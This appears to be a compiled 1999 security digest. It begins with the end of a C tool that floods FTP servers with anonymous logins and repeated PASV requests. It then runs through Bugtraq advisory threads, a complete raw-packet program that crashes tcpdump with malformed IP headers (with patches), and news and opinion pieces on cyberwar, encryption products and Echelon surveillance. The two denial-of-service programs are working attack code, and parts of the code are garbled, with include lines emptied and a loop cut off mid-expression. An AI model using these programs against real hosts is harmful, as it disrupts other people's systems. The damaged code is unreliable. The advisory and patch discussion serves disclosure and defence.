}
}
if( (count < argc)
&&
((sd=connserver(argv[count],21)) < 0) )
{
fprintf(stderr, "could not connect to server");
exit(0);
}
while(1)
{
if(netgets(buff,sizeof(buff),sd)==0)
{
fprintf(stderr, "server closed control connection\n");
closesocket(sd);
exit(0);
}
if(!strncmp(buff,"220 ",4))
{
if(FLAG_VERBOSE & gFlags)
fprintf(stdout, "requesting username\n");
sprintf(buff,"user ftp\n");
send(sd,buff,strlen(buff),0);
}
if(!strncmp(buff,"331 ",4))
{
if(FLAG_VERBOSE & gFlags)
fprintf(stdout, "requesting password\n");
sprintf(buff,"pass pizzaman@illuminati.gov\n");
send(sd,buff,strlen(buff),0);
}
if(!strncmp(buff,"230 ",4))
{
if(FLAG_VERBOSE & gFlags)
fprintf(stdout, "we are logged in now\n");
sprintf(buff,"pasv\n");
send(sd,buff,strlen(buff),0);
}
if(!strncmp(buff,"530 ",4))
{
/* invalid password */
sprintf(buff,"quit\n");
send(sd,buff,strlen(buff),0);
closesocket(sd);
fprintf(stderr, "User ftp wasnt allowed\n");
exit(0);
}
if(!strncmp(buff,"227 ",4))
{
char seps[] = "()";
char *token;
/* PASV response */
if(FLAG_VERBOSE & gFlags)
fprintf(stdout, buff);
/* first get the ip/port into the buffer */
token = strtok(buff,seps);
token = strtok((char *)NULL,")");
/* now break off the IP part */
ptr1=(char *)&ip;
ptr1[0]=atoi(strtok(token,","));
ptr1[1]=atoi(strtok((char *)NULL,","));
ptr1[2]=atoi(strtok((char *)NULL,","));
ptr1[3]=atoi(strtok((char *)NULL,","));
/* now get the port number */
ptr1=(char *)&port;
ptr1[0]=atoi(strtok((char *)NULL,","));
ptr1[1]=atoi(strtok((char *)NULL,","));
sprintf(buff,"pasv\n"); // recirculate pasv connection
send(sd,buff,strlen(buff),0);
pizzaman32(ip,port);
}
}
return(0);
}
int connserver(char *host,int port)
{
int sd,addr;
struct hostent *he;
struct sockaddr_in sa;
/* try to resolve the host */
if((addr=inet_addr(host))!= -1)
{
/* dotted decimal */
memcpy(&sa.sin_addr,(char *)&addr,sizeof(addr));
}
else
{
if((he=gethostbyname(host))==NULL)
{
fprintf(stderr, "Unable to resolve %s\n", host);
return(-1);
}
memcpy(&sa.sin_addr,he->h_addr,he->h_length);
}
sa.sin_port=htons(port);
sa.sin_family=AF_INET;
if((sd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0)
{
perror("socket");
return(-1);
}
if(connect(sd,(struct sockaddr *)&sa,sizeof(sa))<0)
{
perror("connect");
return(-1);
}
return(sd);
}
int netgets(char *buff, int len, int sd)
{
int i;
memset(buff,0,len);
for(i=0;i 0)
{
if(char_recv > 0)
{
if(aFlag)
{
aFlag = 0;
ioctlsocket(theSocket, FIONBIO, &aFlag); //block on this transfer
}
if(FLAG_VERBOSE & gFlags)
fprintf(stdout, "*** Got data for %s\n", aFilename);
if(FLAG_STDOUT & gFlags)
{
buff[char_recv] = NULL;
fprintf(stdout, "%s", buff);
}
else
{
if(NULL == out_file)
{
out_file = fopen(aFilename, "wb");
}
if(out_file)
{
fwrite(buff, char_recv, 1, out_file);
}
}
}
}
if((FLAG_VERBOSE & gFlags) && (0 == char_recv))
fprintf(stdout, "server closed connection\n");
if(out_file)
fclose(out_file);
}
@HWA
119.0 useradd -p stores cleartext passwords / shadow-980724
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Fri, 11 Jun 1999 10:11:29 EET
From: Emils Klotins
To: BUGTRAQ@netspace.org
Subject: useradd -p stores cleartext passwords / shadow-980724
Hello.
Sorry if this is reported already. Didn't find it in Bugtraq archives nor in SuSE support db.
OS: SuSE Linux 6.1
Program: useradd
Package: shadow-980724
Problem description:
'useradd' command has an option '-p password' for specifying password to the newly added user.
(This option btw, does not appear anywhere in useradd man page)
If you specify this option along with a password, the password will be stored in /etc/shadow, but
in cleartext, creating 2 problems:?
1. The password is stored in cleartext
2. It of course does not work, for upon login an encrypted version of password is expected to be in
/etc/shadow.
PS. I could agree that specifying password in command-line can be considered quite dangerous,
however, if the option is there, it should either work correctly or not be there.
Emils Klotins e-mail: emils@mail.usis.bkc.lv
Systems Manager URL: http://www.usis.bkc.lv/
USIS Riga 7 Smilsu Str., Riga LV1050, LATVIA
-------------------------------------------------------------------------------
Date: Fri, 11 Jun 1999 16:02:50 -0400
From: "Roche-Kelly, Edmund B."
To: BUGTRAQ@netspace.org
Subject: Re: useradd -p stores cleartext passwords / shadow-980724
I would think the obvious answer is that the password supplied
as an argument to -p is the encrypted password, generated
by any of the mkpasswd utilities.
I agree it's odd that it's not mentioned in the man page.
Ed
-------------------------------------------------------------------------------
Date: Fri, 11 Jun 1999 19:32:03 -0500
From: James Sneeringer
To: BUGTRAQ@netspace.org
Subject: Re: useradd -p stores cleartext passwords / shadow-980724
On Fri, 11 Jun 1999, Roche-Kelly, Edmund B. wrote:
|
| I agree it's odd that it's not mentioned in the man page.
It was added to the man page in version 19990307. SuSE needs to update
their package. The current version is 19990607, available at
ftp://piast.t19.ds.pwr.wroc.pl/pub/linux/shadow/
-James
@HWA
120.0 UID 65536 and shadow-19990307 root compromise
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Mon, 24 May 1999 20:44:28 +0200
From: Lord Evil
To: BUGTRAQ@netspace.org
Subject: UID 65536 and shadow-19990307
Recently one of our admins installed the shadow-19990307 package.
While playing around I noticed that if a new user is created with UID 65536,
he will become root upon login. No root login will be logged, and even if
the tty isn't in /etc/securetty he will be allowed in.
I dont think this is normal behaviour :)
@HWA
121.0 big brother in your cc(!)
~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Tue, 15 Jun 1999 00:17:12 +1000
From: Darren Reed
To: BUGTRAQ@netspace.org
Subject: big brother in your cc
Whilst this isn't strictly speaking a security bug, it borders on
Sun acting in a very "big brother" manner which is frightening!
For those of you using Sun's SUNWspro C compiler package, beware!
The binaries "c89" and "cc" appear to automagically send an email
to "ut-cc@sunpro.Eng.Sun.COM" with a list of C compiler commands,
including some sort of cpu-time summary. Extract as follows:
INFO unix i86pc SunOS 5.7
cc -E
CPU-time 0.010000 0.010000
...
cc -o -Xa -O
CPU-time 0.000000 0.060000
...
cc -o -Xa -O
CPU-time 0.020000 0.050000
and so on. Setting the environment variable UT_NO_USAGE_TRACKING
seems to do the right thing but for those that wish to enable this
feature, check with strings on the available environment settings
to mediate this (search for UT_). The mail is set to originate from
"nobody" so it's unlikely you'll notice it if it fails to be delivered
unless you check your mail queue.
---------------------------------------------------------------------------
Date: Mon, 14 Jun 1999 23:33:09 +0200
From: Casper Dik
To: BUGTRAQ@netspace.org
Subject: Re: big brother in your cc
>Whilst this isn't strictly speaking a security bug, it borders on
>Sun acting in a very "big brother" manner which is frightening!
>
>For those of you using Sun's SUNWspro C compiler package, beware!
>The binaries "c89" and "cc" appear to automagically send an email
>to "ut-cc@sunpro.Eng.Sun.COM" with a list of C compiler commands,
>including some sort of cpu-time summary. Extract as follows:
>
>cc -E
(I have a strong sense of deja-vu, wasn't this discussed before on
BUGTRAQ? Ah wait, Usenet Oct '98)
This compiler "feature" only exists in the pre-FCS compilers (i.e.,
Alpha and Beta products) and other pre-FCS workshop products.
It was documented in several locations, perhaps even in the
"must read and agree to" license, but I think it was pretty prominent.
(The websites have gone now that FCS is here)
(Some older compilers inadvertedly left the code in) 4.0? 4.1?
That is, unless you have a domainname set on your system that ends
in .sun.com; in that case usage tracking also happens with your FCS
compiler.
So it's not all that big brotherish as you make it out:
- for alpha/beta only
- documented how to switch off (in several places)
- the cc command lines forwarded only include the options,
not the option parameters or file name arguments.
(-DFOO becomes -D, -Lpath gives -L etc ; file.c is not listed)
Nothing sinister, just alpha/beta users helping to gather statistics
about compiler option usage. (And us internal Sun folk who get to
test drive all stuff)
Of course, we could argue whether this should be an opt-in or opt-out
thing till we're blue in the face, but let's not.
Suffices to say that I've long since disabled most outgoing mail
>from my system.
Casper
---------------------------------------------------------------------------
Date: Mon, 14 Jun 1999 20:00:05 +0100
From: Alec Muffett
To: BUGTRAQ@netspace.org
Subject: Old Software (Was: Re: big brother in your cc)
[Aleph - please expedite posting this if possible. Love'n'Hugs.]
>Whilst this isn't strictly speaking a security bug, it borders on
>Sun acting in a very "big brother" manner which is frightening!
Hi Guys,
The story I am told, is:
| This is VERY OLD NEWS. This info was collected as part of the
| Workshop 5.0 Early Access and Developer Release programs. It is
| *not*, I repeat, NOT turned on in the FCS release of the product.
| When customers downloaded the Early Access and Developer Release
| products off the web they where told this info was being collected via
| the FAQ and via the web security disclosure statment on the web
| site. In addition, the FAQ told them how to turn it off if they felt
| that it was data they did no want to devulge.
|
| The Early Access and Developer Release web sites are long since
| defunct since the WS 5.0 product FCS in 2/2/99. It used to be located
| at http://access1.sun.com/workshop5.0ea.
...so, can anyone submit an instance of this happening with the non
early-access software?
- alec
---------------------------------------------------------------------------
Date: Tue, 15 Jun 1999 17:16:52 +1000
From: Darren Reed
To: BUGTRAQ@netspace.org
Subject: Re: big brother in your cc
I must admit that I'm quite embaressed about bringing this up without
properly checking which versions, etc, had the described behaviour as
it doesn't appear in any of the FCS versions.
In some mail from Casper Dik, sie said:
>
> (I have a strong sense of deja-vu, wasn't this discussed before on
> BUGTRAQ? Ah wait, Usenet Oct '98)
>
> This compiler "feature" only exists in the pre-FCS compilers (i.e.,
> Alpha and Beta products) and other pre-FCS workshop products.
Yes, I should have checked more fully on systems I have at my
disposal.
> It was documented in several locations, perhaps even in the
> "must read and agree to" license, but I think it was pretty prominent.
And like most licenses which people need to get through to install/get
software, I (like most people) tend to just click "yes" rather than `waste'
time reading it.
Still, I'd have rather seen the email come from foo@ rather than
nobody@ (which has the effect of making it disappear via /dev/null
if an error occurs in delivery).
Darren
@HWA
122.0 TCP MD5 option problem (router DoS)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Mon, 14 Jun 1999 14:29:54 -0400
From: Craig Metz
To: BUGTRAQ@netspace.org
Subject: TCP MD5 option problem
I was implementing the RFC 2385 ("Protection of BGP Sessions via the TCP MD5
Signature Option") option in the OpenBSD stack. For those who don't know the
significance of this option, it is used to provide some level of active attack
(primarily hijacking) protection for BGP sessions on Internet core routers. One
thing I noticed about the spec is that TCP options are completely excluded from
the MAC function.
The IOS TCP implementation doesn't appear to do anything significant with
TCP options and does not send any, and so, therefore, this doesn't seem to be
a problem on those systems. However, there are several other players in the
core router space (e.g., Juniper and Torrent/Ericsson) who use 4.4BSD-derived
operating systems, and those have networking stacks which DO use TCP options.
In particular, 4.4BSD processes the TCP MSS, timestamp, and window size
options, and includes enough padding that one might also be able to shuffle
things around and slip something else in.
A possible active attack might be to sniff a TCP packet in transit and to
spoof a version of that same packet with the TCP options changed, in hopes that
the genuine packet will be dropped in transit but the spoofed one will get
through. A quick read of the BSD source indicates that a MSS option's size of
zero will be internalized, which might be one possible attack to try. Such an
attack might be able to adjust TCP parameters to "choke" the TCP connection;
it will be alive and connected, but little to no routing data would move. That
in turn could be used either as a denial of service attack or to partition
groups of routers to make other attacks harder to detect.
I haven't cooked up a real exploit for this because I don't have any of the
routers that would be affected handy in my lab, but I suppose that someone so
inclined could do so given this discussion and some time to experiment.
The (IMO) obvious fix for this problem is to use IPsec's Authentication
Header (AH) and to deprecate the TCP MD5 option. There are several freely
available and viable AH implementations for BSD (including the NRL, OpenBSD,
and KAME ones) and I believe that modern IOS has AH code in it though it's not
currently set up for protecting routing traffic. AH covers all of the TCP
header and options, as well as typically having a better MAC function (the RFC
2385 option builds a MAC by appending the key, which is possibly the weakest
way to do it).
-Craig
-----------------------------------------------------------------------------------
Date: Wed, 16 Jun 1999 22:33:36 -0400
From: Steven M. Bellovin
To: BUGTRAQ@netspace.org
Subject: Re: TCP MD5 option problem
In message <199906141822.SAA05311@inner.net>, Craig Metz writes:
>
> The (IMO) obvious fix for this problem is to use IPsec's Authentication
> Header (AH) and to deprecate the TCP MD5 option. There are several freely
> available and viable AH implementations for BSD (including the NRL, OpenBSD,
> and KAME ones) and I believe that modern IOS has AH code in it though it's not
> currently set up for protecting routing traffic. AH covers all of the TCP
> header and options, as well as typically having a better MAC function (the RFC
> 2385 option builds a MAC by appending the key, which is possibly the weakest
> way to do it).
The RFC 2385 scheme describes a hack that was developed precisely because
IPSEC wasn't ready, and *something* was needed to protect BGP traffic.
You're absolutely right -- no one should use it for any new work.
@HWA
123.0 tcpdump 3.4 bug? (DoS)
~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 1 Jan 1986 16:30:10 +0100
From: badi
To: BUGTRAQ@netspace.org
Subject: tcpdump 3.4 bug?
/*
tcpdump bug 3.4a? by BLADI (bladi@euskalnet.net);
On receiving an ip packet with Protocol-4 and ihl=0, tcpdump enters
an infinite loop within the procedure ip_print() from file print_ip.c
This happens because the header length (ihl) equals '0' and tcpdump
tries to print the packet
I've tried the bug in diferent OS's
Linux:
SuSE 6.x:
K2.0.36 tcpdump consumes all the system memory
K2.2.5 in less than a minute and hangs the system
K2.2.9 or sometimes gives an error from the bus
K2.3.2
K2.3.5
RedHat 5.2: K2.?.? tcpdump makes a segmentation fault to happen
6.0: K2.2.9 and it sometimes does a coredump
Debian K2.2.? tcpdump makes a segmentation fault to happen
and does a coredump
Freebsd Segmentation fault & Coredump Thanks to: wb^3,Cagliostr
Solaris Segmentation fault & Coredump Thanks to: acpizer
Aix ?
Hp-UX ?
-------------------------------------------------------------
This tests have been carried out in loopback mode, given that protocol 4
won't get through the routers. It would be interesting to perform the attack
remotely in an intranet.
But i do not have access to one.
------------------------------------------------------------------------------
Thanks to:
the channels:
#ayuda_irc,#dune,#linux,#networking,#nova y #seguridad_informática.
>from irc.irc-hispano.org
Special thanks go to:
Topo[lb],^Goku^,Yogurcito,Pixie,Void,S|r_|ce,JiJ79,Unscared etc...
Thanks to Piotr Wilkin for the rip base code ;)
And big thanks go to TeMpEsT for this translation.
------
I've found two ways of solving the problem
Solution 1
execute: tcpdump -s 24
Solution 2 Apply this little patch.
diff -r -p /tcpdump-3.4a6/tcpdump-3.4a6/print-ip.c /tcpdump-3.4a7/tcpdump-3.4a6/print-ip.c
*** /tcpdump-3.4a6/tcpdump-3.4a6/print-ip.c Wed May 28 21:51:45 1997
--- /tcpdump-3.4a7/tcpdump-3.4a6/print-ip.c Tue Oct 27 05:35:27 1998
*************** ip_print(register const u_char *bp, regi
*** 440,446 ****
(void)printf("%s > %s: ",
ipaddr_string(&ip->ip_src),
ipaddr_string(&ip->ip_dst));
- ip_print(cp, len);
if (! vflag) {
printf(" (ipip)");
return;
--- 440,445 ----
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
struct icmp_hdr
{
struct iphdr iph;
char text[15];
}
encaps;
int in_cksum(int *ptr, int nbytes)
{
long sum;
u_short oddbyte, answer;
sum = 0;
while (nbytes > 1)
{
sum += *ptr++;
nbytes -= 2;
}
if (nbytes == 1)
{
oddbyte = 0;
*((u_char *)&oddbyte) = *(u_char *)ptr;
sum += oddbyte;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
struct sockaddr_in sock_open(int socket, char *address,int prt)
{
struct hostent *host;
struct sockaddr_in sin;
if ((host = gethostbyname(address)) == NULL)
{
perror("Unable to get host name");
exit(-1);
}
bzero((char *)&sin, sizeof(sin));
sin.sin_family = PF_INET;
sin.sin_port = htons(prt);
bcopy(host->h_addr, (char *)&sin.sin_addr, host->h_length);
return(sin);
}
void main(int argc, char **argv)
{
int sock, i,k;
int on = 1;
struct sockaddr_in addrs;
printf("\t\tTCPDumper Ver 0.2 \n\t\t\tBy Bladi\n");
if (argc < 3)
{
printf("Uso: %s \n", argv[0]);
exit(-1);
}
encaps.text[0]=66; encaps.text[1]=76; encaps.text[2]=65; encaps.text[3]=68;
encaps.text[4]=73; encaps.text[5]=32; encaps.text[6]=84; encaps.text[7]=90;
encaps.text[8]=32; encaps.text[9]=84; encaps.text[10]=79;encaps.text[11]=32;
encaps.text[12]=84;encaps.text[13]=79;encaps.text[14]=80;encaps.text[15]=79;
sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1)
{
perror("Can't set IP_HDRINCL option on socket");
}
if (sock < 0)
{
exit(-1);
}
fflush(stdout);
addrs = sock_open(sock, argv[2], random() % 255);
encaps.iph.version = 0;
encaps.iph.ihl = 0;
encaps.iph.frag_off = htons(0);
encaps.iph.id = htons(0x001);
encaps.iph.protocol = 4;
encaps.iph.ttl = 146;
encaps.iph.tot_len = 6574;
encaps.iph.daddr = addrs.sin_addr.s_addr;
encaps.iph.saddr = inet_addr(argv[1]);
printf ("\t DuMpInG %s ---> %s \n",argv[1],argv[2]);
if (sendto(sock, &encaps, 1204, 0, (struct sockaddr *)&addrs, sizeof(struct sockaddr)) == -1)
{
if (errno != ENOBUFS) printf("Error :(\n");
}
fflush(stdout);
close(sock);
}
--------------------------------------------------------------------------------
Date: Thu, 17 Jun 1999 12:19:06 +0100
From: acpizer
To: BUGTRAQ@netspace.org
Subject: Re: tcpdump 3.4 bug?
The given source for killing tcpdump will only work on local networks
since routers drop the bad packet it creates, a more constuctive patch for
tcpdump is listed below.
-- snip --
diff -r -p print-ip.orig.c print-ip.c
*** print-ip.orig.c Thu Jun 17 11:24:17 1999
--- print-ip.c Thu Jun 17 14:07:50 1999
*************** ip_print(register const u_char *bp, regi
*** 374,379 ****
--- 374,384 ----
(void)printf("truncated-ip %d", length);
return;
}
+
+ if (ip->ip_hl == 0) {
+ (void)printf("bad ip packet - header length = 0\n");
+ return;
+ }
hlen = ip->ip_hl * 4;
len = ntohs(ip->ip_len);
-- snip --
Cheers.
-------------------------------------------------------------------------------
"Probably you've only really grown up, when you can bear not being understood."
Marian Gold /Alphaville
--------------------------------------------------------------------------------
Date: Fri, 18 Jun 1999 13:16:33 +0300
From: Markus Peuhkuri
To: BUGTRAQ@netspace.org
Subject: Re: tcpdump 3.4 bug?
acpizer writes:
> since routers drop the bad packet it creates, a more constuctive patch for
...
> + if (ip->ip_hl == 0) {
Actualy, as the minimum length is 5*4 bytes that could be as
well "if (ip->ip_hl < 5) {". If it is shorter it is bad anyway.
--
Markus Peuhkuri ! Markus.Peuhkuri@hut.fi ! http://www.iki.fi/puhuri/
--------------------------------------------------------------------------------
Date: Sun, 20 Jun 1999 09:17:32 +0100
From: acpizer
To: BUGTRAQ@netspace.org
Subject: Re: tcpdump 3.4 bug? (final)
Hi again,
Thanks goes to Markus Peuhkuri for pointing out that the minimum length
of an IP packet is actually 20 bytes, (I'm useless w/o a copy of TCP/IP
Illustrated in front of me), anyway, here is a final patch, also don't
forget to run tcpdump with the -v parameter if you want to see the source
address of the offensive packet.
Are the guys at LBL reading bugtraq? (tcpdump on ftp.ee.lbl.gov isn't
updated yet...)
maybe they don't think it's a bug since routers drop the packet anyway,
how aobut attacking machines which run tcpdump locally on the LAN?
*** print-ip.orig.c Thu Jun 17 11:24:17 1999
--- print-ip.c Sun Jun 20 11:04:20 1999
*************** ip_print(register const u_char *bp, regi
*** 440,445 ****
--- 440,451 ----
(void)printf("%s > %s: ",
ipaddr_string(&ip->ip_src),
ipaddr_string(&ip->ip_dst));
+
+ if (ip->ip_hl < 5) {
+ (void)printf("Bad ip-in-ip encapsulation (hl < 5) Possible attack!");
+ return;
+ }
+
ip_print(cp, len);
if (! vflag) {
printf(" (ipip)");
Cheers.
-------------------------------------------------------------------------------
"Probably you've only really grown up, when you can bear not being understood."
Marian Gold /Alphaville
@HWA
124.0 [ISN] A mouse that roars?
~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: William Knowles
http://www.washingtonpost.com/wp-srv/national/dotmil/arkin.htm
A Mouse That Roars?
By William M. Arkin
Special to washingtonpost.com
Monday, June 7, 1999
Last week, Newsweek reported that President Clinton approved a covert
operation in May to find an electronic silver bullet to do what the White
House at the time believed the air war couldn't. According to the report,
the CIA would conduct a cyberwar against Milosevic, specifically going
after his financial assets in banks throughout Europe.
Is the keyboard mightier than the sword?
Before Allied Force, the intelligence agencies held a cyberwar exercise to
answer this very question.
At center stage was the Information Operations Technology Center (IOTC),
activated last year and made up of the best cyberwarriors of the U.S.
government. Housed at National Security Agency headquarters at Fort Meade,
Md., IOTC brings together highly secret capabilities: NSA's P42
information warfare cell, the CIA's Critical Defense Technologies
Division, the Pentagon's "special technology operations."
Military sources familiar with the March demonstration say there is no
question that the keyboard covert operators wowed the Joint Staff with
their computer attack capabilities. But they are adamant in insisting that
cyberbombs are more laboratory technologies than usable weapons. In fact,
the sources point out, the only cyberwar raging is inside the U.S.
government where Washington lawyers and policymakers, military leaders,
and official hackers battle over the value and legality of network attack.
Where's The Bits?
---------------------------------------------------------------------------
The day bombs started falling on Yugoslavia, the Air Force Association
convened a high-level symposium in San Antonio, Tex., to address the
status of information warfare. Washingtonpost.com has obtained a
transcript of the two-day proceeding.
Gen. John Jumper, commander of U.S. Air Forces in Europe, joined the
closed-door session via satellite from his headquarters in Germany. "I
have not had much sleep over the last 48 hours, and I am probably not as
sharp or prepared as I would like to be," he apologized.
Tired or not, the senior air force officer in Europe wasted no time
blasting the bias of information warriors to fight battles solely at the
"strategic level." He was referring to the very sort of effort Newsweek
would speculate about two months later.
"When we hear talk of information warfare," Jumper said, "the mind
conjures up notions of taking some country's piece of sacred
infrastructure in a way that is hardly relevant to the commander at the
operational and tactical level."
"I would submit that we are not there with information warfare," he
concluded.
Networking Network Attack
----------------------------------------------------------------------------
Brig. Gen. John B. Baker, commander of the Air Intelligence Agency and
head of the Pentagon's Joint Command and Control Warfare Center, followed
Jumper.
"In my hat as the air force component commander for NSA," he warned, "I
spend a lot of time working ... on how to exploit what is going on out
there in computer networks." But when it comes to going beyond collecting
computer transmissions as raw intelligence to actually manipulating and
exploiting the "zeroes and ones" for military value, Baker said, "we have
a ways to go."
---------------------------------------------------------------------------
Despite all the new information warfare organizations that have been
established of late, he lamented that cyberwarriors did not yet have the
stature of other warriors: "Effects-based warfare," that is, methods
geared to achieve an outcome and not cause traditional damage lacks the
"visually pleasing destruction from an armed bomb."
Baker stressed that part of the problem in any kind of computer network
attack is the concerns on the part of policy-makers in Washington with
regard to legality and "traceability."
Jumper described his experience: "I picture myself around that same
targeting table where you have the fighter pilot, the bomber pilot, the
special operations people and the information warriors. As you go down the
target list, each one takes a turn raising his or her hand saying, I can
take that target.' When you get to the info warrior, the info warrior
says, "I can take the target, but first I have to go back to Washington
and get a finding."
Seeking permission invariably results in artificial restrictions and
hesitations in attacking targets, Jumper stressed. From a field
perspective, he said, the process of seeking the "special" operation cedes
too much decision-making to inside the Beltway.
Finding The Way
The unusually candid discussions of the institutional and military
stumbling blocks to an information warfare future contrasts with the
Hollywood vision of cyberwar so common in the mainstream media these days.
Still, Maj. Gen. Bruce A. "Orville" Wright told the symposium that "Within
the area of computer network exploitation, there is tremendous investment,
which, with a little bit of fine tuning, can be turned into a computer
network attack capability."
The IOTC, Wright said, "is a great organization that has a bright future."
He should know. As Deputy Director for Information Operations for the
Joint Chiefs of Staff, he is the military head of the interagency center
and the top cyber-warrior in the U.S. military.
But the key word is future.
With the shooting war against Yugoslavia over, it should be crystal clear
to anyone that exotic American cyberbombs have not aided the effort in any
way.
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
125.0 [ISN] Product Review: NOVaSTOR DataSAFE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From: "L. Sassaman"
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Product Review: NOVaSTOR DataSAFE
L. Sassaman
6/1/1999
The NOVaSTOR web site (http://data-encryption.com/index.html) makes this
bold claim regarding their DataSAFE product:
"Password Protect, Compress and Encrypt your Files and Email Protect your
data from prying eyes! The DataSAFE family of encryption software stores,
transmits and receives electronic files securely. Protect your sensitive
files and data from prying eyes, whether on your PC or over the Internet
and World Wide Web. DataSAFE encrypts your data with BLOWFISH or RSA
secure algorithms which have never been broken, and can encrypt and
protect every type of file on every kind of media."
The benefits of using this software package are clear, according to the
company. "DataSAFE is the only encryption software on the market that lets
you send secure documents to people who do not have the program."
Apparently, for a mere $39.50, one can have a quick, easy way of sending
secure files to anyone with a computer. When using this product, the sender
uses the program to generate a .exe file, encrypted with Blowfish, that he
then sends as an attachment through email. The recipient does not need to
have any additional software on his computer, as the encrypted message
runs by itself (popping up a cute safe, which spits out the plain-text
when the correct combination is entered.)
Now, obviously, this lacks all the benefits of public key cryptography.
(The key, or "combination to the safe" must be delivered to the recipient
in some manner deemed secure. We are now back to the days of relying on
couriers with hand-cuffed brief-cases for security. The web page steps
over this issue, merely saying "you send [the key] separately".) The
product offers no identity verification for the author or originator of
the file being transfered. In addition, the .exe generated is a potential
carrier of virii, and only works on Microsoft systems. (Though a Java
version is promised.)
The product white paper
(http://data-encryption.com/datasheets/ds_white.html) makes this absurd
statement regarding public key cryptography (PKC):
"Public key encryption was discarded because it is too difficult to
establish key exchange with third party organizations running a variety of
computer hardware, mail systems and security programs. For example, a
typical law office needs to be able to send secure documents to a wide
range of client organizations, each having their own unique combination of
computers, mail and security systems."
PGP, and its free clone released under the GPL, GnuPG, are perfect
examples of secure PKC that are easily implemented across a variety of
computer hardware, mail systems and security systems. There is an
established network of public key servers that is widely used by nearly
every combination of software and hardware across the entire Internet.
(http://http://pgp.ai.mit.edu/ is one such server.) DataSAFE, however, is
not available except on systems running the correct versions of Microsoft
operating systems.
The closing statement on the product white paper offers this explanation
for the product's design:
"It should be recognized that BLOWFISH is just one of many excellent
encryption algorithms. In real life situations the security provided
depends much more on the user's ability to make use of the software than
the mathematical underpinnings of the encryption engine. The NOVaSTOR
DataSAFE strives to be so simple to use that people are willing and able
to secure their files."
Granted, the best encryption software in the world is useless if people
won't use it. But, in my opinion it is far more dangerous to lure people
into a false sense of security. Products like DataSAFE could possibly
encourage someone to reveal sensitive material on electronic
correspondence that he would otherwise have been reluctant to communicate.
It is my recommendation that DataSAFE not be used by anyone requiring
anything more than casual security. The freely available GnuPG
(http://www.gnupg.org), and the inexpensive PGP (www.pgp.com) offer the
best system for secure email communication available, and should be used
by anyone who is concerned about privacy. Products like DataSAFE should be
set aside, along with the secret decoder ring from the breakfast cereal
box.
L. Sassaman
System Administrator | "What's true in our minds is true,
Technology Consultant | whether some people know it or not."
icq.. 10735603 |
pgp.. finger://ns.quickie.net/rabbi | --Robin Williams
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v0.9.7 (GNU/Linux)
Comment: OpenPGP Encrypted Email Preferred.
iD8DBQE3U/MyPYrxsgmsCmoRAthbAJsGLzLS8wCqjnwSLgkZY6lEJN6kUQCeJhwC
H5e+Iquwq/c1GUq6ndZzdPY=
=BN59
-----END PGP SIGNATURE-----
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
126.0 [ISN] Technology a threat to right of privacy Silicon Valley
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: Putrefied Cow
Technology a threat to right of privacy Silicon Valley
(Irish Times; 06/04/99)
Last week, the US Congress requested that its intelligence services
provide a detailed report about a global electronic eavesdropping system
know as Echelon. They refused. Now congress is moving to make its request
law.
Echelon is just one of the emerging uses of technology that is eroding
a basic human right, privacy. The system indiscriminately monitors
satellite and Internet communications traffic using keyword searches in
the case of e-mail, and scanning for certain telephone numbers in the case
of mobile phones.
The report was requested by Congress's House Committee on Intelligence
and specifically asked that National Security Agency and the Central
Intelligence Agency provide an account as to what legal standard they use
to monitor US citizens.
Another system, currently in the pipeline is EU's Enfopol, a
specification that will provide European law enforcement officials with an
electronic back door into the computer systems of Internet Service
Providers and mobile telecommunications companies.
Furthermore, later this year, the EU plans to introduce new encryption
(a technology that scrambles data so that it cannot be read by
eavesdroppers) legislation, which may affect people's right to exchange
messages that cannot be read by law enforcement.
Indeed, Internet and electronic privacy will be one of the biggest
issues affecting citizens in the next century. Unfortunately law makers in
Ireland, Europe and the US are staggeringly e naive about the effects
these new laws, systems and so-called specifications will have on their
future.
The problem is one of ignorance. Law makers often don't understand
technology and don't look far enough into the future to see how Internet
and wireless communications will touch virtually every aspect of our lives
in the not too distant future. But why the concern? Police and
intelligence services are only trying to catch terrorist, criminals and
child pornographers. True, if they are to catch these people they need to
be able to track their movements, ensure that they are not shifting large
amounts of money into offshore bank accounts and nip their next deadly or
grossly illegal plans in the bud.
Surely, you couldn't object to that? Unless, of course, you would
object to passing a law that would enable police go through your
credit-card receipts without a court order, tap your telephone at will and
make a list of every place you visited, and every person you talked to
without proper judicial control. Because that is what these systems allow.
Increasingly people are buying goods and services on the Internet. This
not only includes a novel from say, Amazon.com, but banking, share trading
and even insurance services. Back-door access to mobile telephone records
will not only provide access to conversations but pinpoint the location of
the mobile phone and therefore its user. Furthermore, governments
mistakenly believe that their judicial system will protect their citizens
from abuses of these new methods of data collection and surveillance.
However perhaps it's not just the local police force that should concern
us, but the police force and intelligence agencies of foreign governments.
Take the Echelon system, for example, it was established under the
UKUSA agreement by the US's National Security Agency, and Britain's
General Communications Headquarters to monitor the communications of the
eastern bloc countries. While Echelon was designed as a system to monitor
spies, according to a recent report prepared for the European Parliament's
Scientific and Technology Options Assessment Panel there is evidence that
member-countries also use the Echelon system for industrial espionage. The
report states that British intelligence routinely collects information
such as "company plans, telexes, faxes, and transcribed phone calls," and
that the **NSA** provides weekly reports to the US department of commerce.
